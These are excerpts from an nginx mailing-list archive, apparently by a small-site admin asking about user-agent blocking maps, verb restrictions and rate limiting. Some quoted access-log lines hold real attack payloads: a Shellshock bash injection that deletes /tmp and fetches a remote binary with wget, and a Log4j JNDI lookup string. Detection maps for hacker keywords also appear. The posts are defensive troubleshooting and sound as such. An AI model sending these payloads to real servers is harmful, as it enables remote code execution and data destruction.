I have a map to check for bad user agents called badagent. I want to
set up an RSS feed. The feedreaders can have funny agents, so I need to
omit the bad agent check if the file is any xml type.
This is rejected.
if (($request_uri != [*.xml]) && ($badagent)) {return 444; }
Suggestions?
Stripping down the nginx.conf file:
server{
    location / {
        root /usr/share/nginx/html/mydomain/public_html;
        if ($badagent) { return 403; }
    }
    location = /feeds {
        try_files $uri $uri.xml $uri/ ;
    }
}
The "=" should force an exact match, but the badagent map is checked.
On Wed, 9 Jan 2019 08:20:05 +
Francis Daly wrote:
> On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > Stripping down the nginx.conf file:
> >
> > server{
> > location / {
> > root /usr/share/nginx
On Thu, 10 Jan 2019 08:50:33 +
Francis Daly wrote:
> On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > location / {
> > if ($badagent) { return 403; }
> > }
> > location = /feeds {
>
On Thu, 07 Mar 2019 13:33:39 -0500
"wkbrad" wrote:
> Hi all,
>
> I just wanted to share the details of what I've found about this
> issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some
> really great answers!
>
> The more I look into this the more I'm convinced this is an issue
>
On Fri, 08 Mar 2019 10:42:28 -0500
"wkbrad" wrote:
> Thanks for that info. It's definitely harder to notice the issue on
> small servers like that. But you are still seeing about a 50%
> increase in ram usage there by your own tests.
>
> The smallest server I've tested this on uses about 20M d
Answers intermixed below.
On Wed, 11 Mar 2020 21:23:15 -0400
"MAXMAXarena" wrote:
> Hello @Ralph Seichter,
> what do you mean by "mutually exclusive"?
> As for the tools I mentioned, it was just an example.
> Are you telling me I can't solve this problem?
>
>
> Hello @garic,
> thanks for this
I insist on encryption so this is what I use:
server {
    listen 80;
    server_name yourdomain.com www.yourdomain.com ;
    if ($request_method !~ ^(GET|HEAD)$ ) {
        return 444;
    }
    return 301 https://$host$request_uri;
}
I only serve static pages so I use
I don't have any service using java so I don't believe I am subject to
this exploit. However I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.
200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706
"${${lower:jndi}:${lower:rm
> interpolate these, and thus be vulnerable to the exploit.
>
> On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com
> wrote:
>
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. However I am confused why a returned a 20
On Mon, 20 Jun 2022 17:23:23 -0400
"_lukman_" wrote:
> server
> {
>listen 443 default_server ssl;
>listen [::]:443 ssl http2;
>server_name dummysite.io www.dummysite.io;
>ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; #
> managed by Certbot
>ssl_certifica
On Sat, 30 Jul 2016 13:18:47 +0300
"Valentin V. Bartenev" wrote:
> On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > I see a fair amount of hacking attempts in the access.log. That is,
> > they
> show up with a return code of 400 (malformed). Wel
I see a return code of 200. Does that mean this script was executed?
-
219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo echo
On Sat, 30 Jul 2016 23:49:30 +0300
"Valentin V. Bartenev" wrote:
> On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300
> > "Valentin V. Bartenev" wrote:
> >
> > > On Friday 29 July 2016 23:01:0
Nginx 1.10.1,2
FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016
I'm using the "map" module to detect obvious hacking by detecting
keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is
easy. I give them a 444 return code with the idea being I can run a
script on the log
Link goes to conf file
https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0
On Tue, 23 Aug 2016 20:51:55 +0300
"Reinis Rozitis" wrote:
> > Configuration file included in the post. I already checked it.
>
> You have shown only few excerpts (like there might be other
> access_log directives
should try to duplicate this in the event it has something
to do with my setup.
On Mon, 12 Sep 2016 15:30:01 -0700
li...@lazygranch.com wrote:
> Most of the chatter on the interwebs believes that the rate limit is
> per connection, so if some IP opens up multiple connections, they get
I got a spoofed googlebot hit. It was easy to detect since there were
probably a hundred requests that triggered my hacker detection map
scheme. Only two requests received a 200 return and both were harmless.
200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-"
"Mozilla/5.
http://pastebin.com/tZZg3RbA/?e=1
This is the access.log file data relevant to that fake googlebot. It
starts with a fake googlebot entry, then goes downhill from there. I
rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST
went to 444 directly.
I replaced the domain with a fake
http://pastebin.com/7W0uDrLa
If you need an extensive list of hacker requests (over 200), I put this
log entry on pastebin. As mentioned at the top of the pastebin, the
hacker used my IP address directly rather than my domain name.
I have a "map" that detects typical hacker activity. Perhaps in m
On Sat, 22 Oct 2016 17:40:56 -0400
"itpp2012" wrote:
> The idea is nice but pointless, if you maintain this list over 6
> months you most likely will end up blocking just about everyone.
>
> Stick to common sense with your config, lock down nginx and the
> backends, define proper flood and overf
I only serve static pages, hence I have this in my conf file:
---
## Only allow these request methods ##
if ($request_method !~ ^(GET|HEAD)$ ) {
    return 444;
}
Shouldn't the return code be 444 instead of 400?
--
I keep my nginx server set up dumb. (Don't need anything fancy at the
moment). Is this request below possibly valid? I flag anything with a
question mark in it as hacking, but maybe IOS makes some requests that
some websites will process, and others would just ignore after the
question mark.
444
A bit OT, but can a guru verify I rejected all these proxy attempts.
I'm 99.9% sure, but I'd hate to allow some spammer or worse to route
through my server. The only edit I made is when they ran my IP address
through a forum spam checker. (I assume google indexes pastebin.)
https://pastebin.com/VCg
Here is the map. I truncated my bad agent list, but will get you
started. I used the user agent changer in Chromium to make sure it
worked. -
map $http_user_agent $badagent {
default 0;
~*WordPress
I would like to block the google app from directly downloading images.
access.log:
200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg
HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"
My nginx code in the images location:
if ($http_referer
format.
On Tue, 20 Jun 2017 17:49:14 -0700
Robert Paprocki wrote:
> Do you mean $http_user_agent?
>
> > On Jun 20, 2017, at 17:36, "li...@lazygranch.com"
> > wrote:
> >
> > I would like to block the google app from directly downloading
> >
Actually I think I was mistaken and the field is the user agent. I will
change the variable and see what happens. I did some experiments to
show the pattern match works.
On Tue, 20 Jun 2017 20:56:46 -0700
li...@lazygranch.com wrote:
> I want to block by referrer. I provided a more "
I'm sending 403 responses now, so I screwed up by mistaking the fields
in the logs. I'm going back to lurking mode again with my tail
shamefully between my legs.
This code in the image location section will block the google app:
if ($http_user_agent ~* (com.google.GoogleMobi
On Thu, 13 Jul 2017 23:46:12 +0100
Francis Daly wrote:
> On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote:
>
> Hi there,
>
> > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t
>
> If you were running this command as "root", would that prompt say
> "root@neb" and end with a
I'm curious why this request got a 400 response rather than a 404.
400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm
HTTP/1.1" 173 "-" "-" "-"
log_format main '$status $remote_addr - $remote_user [$time_local] "$request"
'
'$body_bytes_sent "
Here is a log of real life IP limiting with a 30 connection limit:
86.184.152.14 British Telecommunications PLC
8.37.235.199 Level 3 Communications Inc.
130.76.186.14 The Boeing Company
security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40
86.184.152.14 58714 -> myip 80,
I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I
have the firewalls set up properly since I can see my browser requests
in the access and error log. That said, I have file permission problem.
nginx 1.12.2
Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UT
Aziz Rozyev wrote:
> Hi,
>
> have you checked this with disabled selinux ?
>
> br,
> Aziz.
>
>
>
>
>
> > On 20 Dec 2017, at 11:07, li...@lazygranch.com wrote:
> >
> > I'm setting up a web server on a Centos 7 VPS. I'm rela
Presently I'm putting maps in the server location. Can they be put in
the very top to make them work for all servers? If not, I can just make
the maps into include files and insert as needed, but maybe making the
map global is more efficient.
When I was using FreeBSD, the access log was real time. Since I went to
Centos, that doesn't seem to be the case. Is there some way to flush
the buffer?
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
On Thu, 22 Feb 2018 18:40:12 -0800
"li...@lazygranch.com" wrote:
> When I was using FreeBSD, the access log was real time. Since I went
> to Centos, that doesn't seem to be the case. Is there some way to
> flush the buffer?
On Fri, 23 Feb 2018 18:54:48 -0800
"li...@lazygranch.com" wrote:
> On Thu, 22 Feb 2018 18:40:12 -0800
> "li...@lazygranch.com" wrote:
>
> > When I was using FreeBSD, the access log was real time. Since I went
> > to Centos, that doesn't seem to b
I can't get the add_before_body feature to work. I have verified the
module is installed.
Here is what I am trying to accomplish. I want to add the following
lines to the header of every html file:
--
This is supposed
I had a few neurons fire. I forgot nginx can load dynamic modules.
https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/
I haven't done this myself, so you are on your own at this point.
On Fri, 09 Mar 2018 11:59:30 -0500
"neuronetv" wrote:
> I've resigned myself to the fact that th
On Mon, 19 Mar 2018 12:31:20 +
"Friscia, Michael" wrote:
> Just a thought before I start crafting one. I am creating a
> location{} block with the intention of populating it with a ton of
> requests I want to terminate immediately with a 444 response. Before
> I start, I thought I’d ask to se
On Tue, 20 Mar 2018 13:03:09 +
"Friscia, Michael" wrote:
> This is great, thank you again, this is a huge jumpstart!
Per NIST best practices, you should limit the HTML verbs that you
allow. A very simple website can run on just GET and HEAD. Here is how
you 444 websites trying to POST for ex
The centos nginx from the repo lacks ngx_http_hls_module. This is a
technique to add the module without compilation.
https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7
Does anyone have experience with this? I'd like to avoid building nginx
from scratch to make the updates go
I am presently using a scheme like this to prevent scraping documents.
location /images/ {
valid_referers none blocked www.example.com example.com
forums.othersite.com ;
# you can tell the browser that it can only download content from the domain